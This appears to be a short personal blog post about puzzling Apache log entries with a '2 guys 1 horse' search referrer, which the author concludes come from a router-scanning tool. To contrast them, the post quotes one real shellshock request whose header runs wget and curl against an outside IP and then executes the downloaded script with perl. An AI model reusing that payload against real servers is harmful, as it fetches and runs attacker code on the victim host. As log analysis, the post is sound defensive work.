two guys one horse

A few time ago, awstats showed me that someone came to my blog by searching 2 guys 1 horse. At this time, this just made me smile and I thought it was due to a mistake from a searching engine.

But this month, when I saw 3 different connections with the same research subject, I thought it had to come from something different.

When searching "horse" in apache's logs, I found :

153.183.166.241 - - [14/Jul/2015:10:21:57 +0200] "GET /Ringing.at.your.dorbell! HTTP/1.0" 404 500 "http://google.com/search?q=2+guys+1+horse" "x00_-gawa.sa.pilipinas.2015"

153.183.166.241 - - [14/Jul/2015:10:22:00 +0200] "GET / HTTP/1.1" 200 10856 "http://google.com/search?q=2+guys+1+horse" "x00_-gawa.sa.pilipinas.2015"

A quick search for "Ringing.at.your.dorbell!" show many people saw this in their logs and some think it is a shellshock attack, but I don't think this is true and I will explain why.

As an example (real one), this what an apache log look like when someone try to use shellshock :

173.255.225.241 - - [13/Jul/2015:01:10:11 +0200] "GET /cgi-bin/test.cgi HTTP/1.0" 404 496 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://195.242.220.89/mc ; curl -O http://195.242.220.89/mc;perl mc;perl /var/tmp/mc""

We can clearly see () { :;}; who is typical for this attack (but some variants exists) follow by a script allowing the download and execution of a distant code (be careful if you follow the link).

But get back to our horse. Obviously, this does not look like the attack just described before, but if we show all the connection from 153.183.166.241 we get :

153.183.166.241 - - [14/Jul/2015:10:21:57 +0200] "GET /Ringing.at.your.dorbell! HTTP/1.0" 404 500 "http://google.com/search?q=2+guys+1+horse" "x00_-gawa.sa.pilipinas.2015"

153.183.166.241 - - [14/Jul/2015:10:21:58 +0200] "GET / HTTP/1.0" 200 10819 "-" "x00_-gawa.sa.pilipinas.2015"

153.183.166.241 - - [14/Jul/2015:10:22:00 +0200] "GET / HTTP/1.1" 200 10856 "http://google.com/search?q=2+guys+1+horse" "x00_-gawa.sa.pilipinas.2015"

153.183.166.241 - - [14/Jul/2015:10:22:02 +0200] "GET /Diagnostics.asp HTTP/1.0" 404 491 "-" "x00_-gawa.sa.pilipinas.2015"

153.183.166.241 - - [14/Jul/2015:10:22:03 +0200] "GET / HTTP/1.0" 200 10819 "-" "x00_-gawa.sa.pilipinas.2015"

153.183.166.241 - - [14/Jul/2015:10:22:05 +0200] "GET / HTTP/1.0" 200 10819 "-" "x00_-gawa.sa.pilipinas.2015"

153.183.166.241 - - [14/Jul/2015:10:22:10 +0200] "GET / HTTP/1.0" 200 10819 "-" "x00_-gawa.sa.pilipinas.2015"

So I guess it is just a software scanning some IP adress to find a specific system (a DD-WRD admin page ?). But there is two things I didn't understand :

Why loading three time the same page, and why so little discretion ?


Comments :

No comment yet

Add a comment

social